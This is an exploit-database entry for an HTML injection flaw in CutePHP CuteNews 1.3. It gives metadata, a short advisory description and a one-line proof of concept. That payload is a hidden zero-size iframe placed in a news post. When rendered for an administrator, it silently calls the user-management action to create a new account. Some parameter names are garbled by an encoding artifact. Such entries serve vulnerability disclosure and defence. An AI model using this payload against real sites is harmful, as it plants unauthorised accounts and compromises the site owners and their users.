CutePHP CuteNews 1.3 - HTML Injection
Author: Peter Winter-Smith
type: webapps
platform: php
port:
date_added: 2003-06-29
date_updated: 2012-11-20
verified: 1
codes: OSVDB-2224
tags:
aliases:
screenshot_url:
application_url:
source: https://www.securityfocus.com/bid/8060/info
CutePHP is prone to HTML injection attacks. The vulnerability exists due to insufficient sanitization of user-supplied input. Specifically, user-supplied input to news posts are not sufficiently sanitized of malicious HTML code.
<iframe src="index.php?regusername=owned®password= pass®nickname=owned®email=nonenone.com®level= 1&action=adduser&mod=editusers" height=0 width=0 frameborder=0 scrolling=0></iframe>